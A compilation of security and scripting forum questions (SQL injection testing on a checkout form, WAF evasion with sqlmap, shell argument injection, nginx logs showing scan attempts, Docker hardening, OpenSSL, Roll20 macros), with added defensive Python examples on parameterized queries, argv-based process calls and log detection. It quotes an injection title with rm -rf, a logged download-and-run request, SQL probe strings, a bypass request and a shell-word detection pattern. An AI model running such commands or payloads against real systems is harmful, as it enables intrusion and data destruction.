SQL Injection Doesn’t Sanitize But Doesn’t Execute Commands

I am currently doing a pentest on a web application and focusing more on SQL injection. The company I am pentesting has a functionality in which we are allowed to buy things from the vendors/suppliers registered there. When a product is added to our cart and the ‘Checkout’ button is clicked, the web application then communicates with the backend to create a cart based on the specified ‘cart_id’ and INSERT it into the database. I know this is the case since when I tried to resubmit the request to the server the following error is returned:

"SQLIntegrityConstraintViolationException: Duplicate entry 'RANDOM_ALPHANUMERIC_CART_ID' for key 'idx_cart_id'" 

I tried checking for SQL injection by adding a single quote at the end of the ‘cart_id’, and HTTP 200 is returned along with a server response containing a new cart_id with the single quote included. Does this mean it is not sanitizing input? I tried inserting other SQL commands; the server still returns 200 and the commands are printed out in the server response but not executed. Is this web app vulnerable to SQLi (blind?)? If not, is it possible for me to achieve another vuln such as Stored XSS?

Thank you
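The behaviour described in the question (a quote comes back stored verbatim, a resubmit trips the unique index) is exactly what a parameterized INSERT produces, so the following added example, which is not part of the original post and uses an in-memory SQLite table whose schema (`carts`, index `idx_cart_id`) is an assumption modelled on the error message, contrasts the bound-parameter form with the string-concatenated form a tester is actually hunting for. With parameters the quote is data and the only possible error is the duplicate-key one; with concatenation the same quote breaks the statement.

```python
import sqlite3

# Assumed schema: a cart row keyed by a client-supplied cart_id with a unique index,
# mirroring the "Duplicate entry ... for key 'idx_cart_id'" error in the question.
SCHEMA = """
CREATE TABLE carts (
    id      INTEGER PRIMARY KEY,
    cart_id TEXT    NOT NULL,
    user_id INTEGER NOT NULL
);
CREATE UNIQUE INDEX idx_cart_id ON carts(cart_id);
"""


def new_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def create_cart_param(conn, cart_id, user_id=1):
    """Parameterized INSERT: cart_id travels as a bound value, never as SQL text.
    Returns the value the database actually stored."""
    conn.execute(
        "INSERT INTO carts (cart_id, user_id) VALUES (?, ?)", (cart_id, user_id)
    )
    conn.commit()
    row = conn.execute(
        "SELECT cart_id FROM carts WHERE cart_id = ?", (cart_id,)
    ).fetchone()
    return row[0]


def create_cart_concat(conn, cart_id, user_id=1):
    """String-built INSERT (the vulnerable pattern): cart_id is spliced into the
    statement text, so a quote changes the SQL instead of being stored."""
    sql = (
        "INSERT INTO carts (cart_id, user_id) VALUES ('"
        + cart_id + "', " + str(user_id) + ")"
    )
    conn.execute(sql)
    conn.commit()


def probe(conn, fn, cart_id):
    """Run fn the way a tester sees it: the stored value, or the error class."""
    try:
        return ("ok", fn(conn, cart_id))
    except sqlite3.IntegrityError as e:   # duplicate key: the index did its job
        return ("integrity", str(e))
    except sqlite3.OperationalError as e:  # malformed SQL: the quote became syntax
        return ("syntax", str(e))


if __name__ == "__main__":
    db = new_db()
    print(probe(db, create_cart_param, "ABC123'"))   # ('ok', "ABC123'")
    print(probe(db, create_cart_param, "ABC123'"))   # ('integrity', 'UNIQUE constraint failed: ...')
    print(probe(db, create_cart_concat, "XYZ'"))     # ('syntax', 'unrecognized token: ...')
```

The takeaway for triage: a 200 that echoes the quote back unchanged is consistent with correct parameter binding, not evidence of its absence. What the echoed value does show is that the cart_id is reflected into a response, which is the input to check for output encoding (the Stored XSS angle the question raises) rather than for SQL injection.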

site does not respond to some sql injection commands [closed]

I work on a target that I know has a SQL injection bug, because in this URL:


I get this answer

Database Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘Select * form aduan.emel’ ORDER BY transaksi_aduan.no_pendaftaran asc’ at line 11

But some SQL commands, like UNION SELECT @@version-- and Union+select+NUll,null-- don’t work!

When I submit them, the server responds with error 500.

Why does this happen? I think it is the firewall, is there any way to bypass it?

Notice: I have tried all the tamper options in sqlmap, but they didn’t work and the server returned: connection timed out to the target URL or proxy

I also tried --tor but it didn’t work.

Where is the problem?

Is it possible to run commands that exist only on the host on a docker container?

We would like to harden our Docker Image and remove redundant software from it. Our Devs and Ops asked to keep some Linux tools used for debugging on the containers running on our Kubernetes Prod environment.

I’ve read this post: https://www.digitalocean.com/community/tutorials/how-to-inspect-kubernetes-networking

And it made me wonder, is it possible to run commands that exist only on the host, on a container (which those commands have been removed from)?

If so, is there a difference between commands that have been removed from the container and ones that the user doesn’t have permission to run?

P.S. How do the tools in the above mentioned post work?

Thanks for the help! 🙂

Why did “terminal commands” never get a version of SQL “parameterized queries”?

I was taught horrible bad practice when I initially "learned" SQL, which baked in user-submitted input with quotes and attempted to "escape" this (in the beginning, I didn’t even escape it at all…). I then had to spend many years unlearning this, to instead do things like:

SELECT * FROM table WHERE id = $1;

And then the $1‘s data is sent separately to the database, not as part of the actual query string, to make it impossible for "SQL injections" to happen.

However, terminal commands frequently need to be sent untrusted user input, such as:

generate_PDF.exe --template="a path goes here" --title-of-report="arbitrary title from user" 

Every time I have to run such a command, I’m scared to death that my "terminal argument escape" function isn’t working correctly, or has some unknown bug, so that users can make a title along the lines of "; rm -rf /; to execute arbitrary code on my machine.

This becomes even more of a serious issue when the normal "OS quotes" cannot be used, such as:

pg_dump --format custom --file "a real path" --exclude-table="schema name"."table name" 

The "schema name"."table name" part has to be provided in full from the user, and thus I have to attempt to verify the syntax myself, as it cannot just be quoted in its entirety with the "terminal argument escaper" function wrapping it all. (Even if it might be possible in this specific context, I’m talking in general and just using this as an example of when it gets "hairy".)

This has made me wonder why the terminal commands, for example in PHP (since I use this myself for everything) cannot be done like this:

pg_dump --format custom --file $1 --exclude-table=$2

And then we send the actual arguments separately as an array of strings, just like with the "parameterized queries" in SQL databases?

Please note that the $1 and $2 here do not refer to PHP variables, but to "placeholders" for the "engine" which interprets this and which lives either in PHP or the OS.

Why is this not a thing? Or maybe it is, only I haven’t heard of it? I’m continuously baffled by how many things which I constantly need and use just "sit there and rot" while they keep releasing a new programming language every week which nobody uses. I feel more and more frustrated about how "stale" everything I care about seems, but this risks getting off-topic, so I’ll stick to the question I’ve just asked for now.
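The "send the arguments separately as an array" model the question asks for does exist at the OS level: `execve()` takes an argument vector, and the shell is only involved when a program chooses to build a command string and hand it to one. The added example below (not from the original post, written in Python because its `subprocess` module exposes the argv form directly; PHP 7.4 and later accept an array in `proc_open` for the same effect) runs a stand-in child process that reports the argv it received, so the hostile title from the question can be seen arriving as one intact argument. The `pg_dump` argv builder and its `PG_QUALIFIED` syntax check are assumptions illustrating the second case: with no shell in the path, the only validation left is the one the target program itself needs.

```python
import json
import re
import subprocess
import sys

# Stand-in for generate_PDF.exe / pg_dump so the example runs anywhere: a child
# Python process that reports the argv it actually received, as JSON.
ECHO_ARGV = "import json, sys; print(json.dumps(sys.argv[1:]))"


def run_argv(args):
    """Run the child with an argv list. No shell parses the list, so quotes,
    semicolons and spaces inside one element are delivered verbatim as that element."""
    result = subprocess.run(
        [sys.executable, "-c", ECHO_ARGV, *args],
        capture_output=True, text=True, check=True,
    )
    return json.loads(result.stdout)


def report_argv(template_path, title):
    """Argument vector for the report generator; 'title' is untrusted user input
    and needs no escaping because it never becomes shell syntax."""
    return ["--template=" + template_path, "--title-of-report=" + title]


# Postgres-style qualified name: each part is a plain identifier or a double-quoted
# one (assumption: doubled quotes inside a quoted part are allowed, as in SQL).
PG_PART = r'(?:[A-Za-z_][A-Za-z0-9_$]*|"(?:[^"]|"")+")'
PG_QUALIFIED = re.compile(rf"^{PG_PART}\.{PG_PART}$")


def pg_dump_argv(out_file, exclude_table):
    """Argument vector for pg_dump. The --exclude-table value is checked against the
    syntax pg_dump expects (schema.table), not against shell metacharacters,
    because no shell will ever see it."""
    if not PG_QUALIFIED.match(exclude_table):
        raise ValueError(f"not a schema.table name: {exclude_table!r}")
    return ["--format", "custom", "--file", out_file, "--exclude-table=" + exclude_table]


if __name__ == "__main__":
    hostile = '"; rm -rf /; echo "'
    print(run_argv(report_argv("/tmp/report.tpl", hostile)))
    print(pg_dump_argv("/tmp/out.dump", '"my schema"."my table"'))
```

The argv form is the shell equivalent of the `$1` placeholder: the program name and each argument are separate strings from the start, so there is no string for an injection to break out of. The part that still has to be validated (`schema.table`) is validated for the consuming program's grammar, which is a much smaller and better-defined job than defending against every shell.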

Can Windows CMD/DOS Commands Be Used In An OpenSSL Configuration File On Windows 10? [migrated]

I’m using OpenSSL v1.1.1g on a Windows 10 machine (I don’t know Linux – yet). Can Windows CMD/DOS commands be used in the OpenSSL configuration file or is the configuration file limited to the use of OpenSSL commands only? I assume the answer to this question is "No" since OpenSSL uses its own parser to process OpenSSL configuration files, but I’d like to have my assumption confirmed.

Why request shell commands from nginx?

I was playing around with nginx and noticed that within 1-2 hours of putting it online, I got entries like this in my logs:

- -  "GET /shell?cd+/tmp;rm+-rf+*;wget+;sh+/tmp/jaws HTTP/1.1" 301 169 "-" "Hello, world"
- -  "GET / HTTP/1.1" 301 169 "http://[IP OF MY SERVER]:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
- -  "GET / HTTP/1.1" 400 157 "-" "-"
- -  "GET / HTTP/1.1" 400 157 "-" "-"

The IPs are, needless to say, not expected for this server.

I assume these are automated hack attempts. But what is the logic of requesting shell commands from nginx? Is it common for nginx to allow access to a shell? Is it possible to tell what specific exploit was attacked from these entries?
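Stock nginx has no `/shell` endpoint and does not execute anything in a request target; the 301 in the log line shows it simply answered with a redirect. Requests like this are mass scans aimed at devices that do expose such a handler, and the useful defensive response is to recognise them in the access log. The following added example (not part of the original post) parses nginx "combined" log lines, decodes the `+`-encoded query so `rm+-rf` reads as `rm -rf`, and flags request targets that carry shell indicators. The sample lines are constructed, with documentation-range IPs and a made-up timestamp, and the first reproduces the request shape from the question.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines in nginx "combined" format (IPs from the documentation
# range, not real clients); the first mirrors the request quoted in the question.
SAMPLE_LOG = """\
203.0.113.10 - - [12/Jun/2020:10:01:02 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+;sh+/tmp/jaws HTTP/1.1" 301 169 "-" "Hello, world"
203.0.113.11 - - [12/Jun/2020:10:03:15 +0000] "GET / HTTP/1.1" 301 169 "http://198.51.100.1:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
203.0.113.12 - - [12/Jun/2020:10:04:40 +0000] "GET / HTTP/1.1" 400 157 "-" "-"
203.0.113.13 - - [12/Jun/2020:10:05:01 +0000] "GET /index.html?page=2 HTTP/1.1" 200 512 "-" "curl/7.68.0"
"""

# nginx "combined" format: ip ident user [time] "method target proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Shell words that have no business in a request target. Matched on the decoded
# target and only when delimited like a command word, so "/shell" does not count as "sh".
SHELL_WORDS = re.compile(r'(?:^|[;&|\s`$(?])(cd|rm|wget|curl|sh|bash|chmod)(?=\s|$|;)')


def parse_line(line):
    """Return the log fields as a dict, or None if the line is not in combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def shell_indicators(target):
    """Reasons a request target looks like a shell command string (empty list if none)."""
    decoded = unquote_plus(target)  # '+' and %xx become the characters the scanner meant
    reasons = []
    if decoded.startswith("/shell"):
        reasons.append("path /shell")
    if ";" in decoded:
        reasons.append("command separator ;")
    words = sorted({m.group(1) for m in SHELL_WORDS.finditer(decoded)})
    if words:
        reasons.append("shell words " + ",".join(words))
    return reasons


def scan(log_text):
    """Return (ip, target, reasons) for every parsable line whose target carries shell indicators."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = shell_indicators(entry["target"])
        if reasons:
            hits.append((entry["ip"], entry["target"], reasons))
    return hits


if __name__ == "__main__":
    for ip, target, reasons in scan(SAMPLE_LOG):
        print(f"{ip} {target}\n    {'; '.join(reasons)}")
```

The flagged entry tells you what was attempted (a download-and-run of `/tmp/jaws`) and, via the status code, that nginx did not act on it; the two 400 lines with empty user agents are a separate pattern (malformed or non-HTTP probes) that this scanner deliberately leaves alone. Pair the hit list with your own server inventory to confirm nothing behind nginx actually serves a `/shell` path.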

How can I issue multiple commands from a single query choice in Roll20?

I created a set of macros using the API to generate attributes for characters on Roll20 to refer to their pronouns for use in macros. I currently have it set up with 3 macros, each with 4 lines because I can’t add multiple attributes with a single command.

How can I use a macro to query which set (male, female, or neutral) of pronouns I want to use? I know I should be able to do something like

 ?{Male, Female, or Neutral? | Male,#Pronouns_M | Female,#Pronouns_F | Neutral,#Pronouns_N}  

And that should work, but I’d rather have the contents of those sub-macros in the main one and delete the sub-macros. Problem is, each of the sub-macros is 4 lines, such as #Pronouns_F:

 !setattr --sel --subjective|'she'
 !setattr --sel --objective|'her'
 !setattr --sel --PossessiveA|'her'
 !setattr --sel --PossessiveP|'hers'

Is this a thing I can do or do I have to settle for the sub macros?